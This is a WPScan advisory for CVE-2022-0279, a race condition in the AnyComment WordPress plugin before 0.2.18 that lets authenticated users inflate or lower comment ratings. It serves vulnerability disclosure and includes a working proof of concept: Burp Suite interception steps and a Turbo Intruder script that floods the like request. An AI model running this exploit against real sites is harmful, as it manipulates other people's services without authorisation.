WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

AnyComment < 0.2.18 - Comment Rating Increase/Decrease via Race Condition

Description

The plugin is affected by a race condition when liking/disliking a comment/reply, which could allow any authenticated user to quickly raise their rating or lower the rating of other users

Proof of Concept

https://www.youtube.com/watch?v=0IqZL-slt00

1. Make a new comment
2. Like your comment and intercept it using burpsuite
3. In burpsuite, right click the request and send to turbo intruder, you need turbo intruder installed first
4. Configure the turbo intruder script to your liking and run it
5. You will see that your comment has alot of likes and a very high rating now.

Turbo config:
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=100,
                           pipeline=False
                           )

    for word in range(20):
        engine.queue(target.req, word)


def handleResponse(req, interesting):
    if req.status != 404:
        table.add(req)

Affects Plugins

anycomment
Fixed in version 0.2.18

References

CVE
CVE-2022-0279

Classification

Type

RACE CONDITION

OWASP top 10
A6: Security Misconfiguration
CWE
CWE-362

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter website
https://noobexploiter.github.io/
Submitter twitter
tomorrowisnew_
Verified

Yes

WPVDB ID
43a4b2d3-1bd5-490c-982c-bb7120595865

Timeline

Publicly Published

2022-01-19 (about 1 years ago)

Added

2022-01-19 (about 1 years ago)

Last Updated

2022-04-12 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin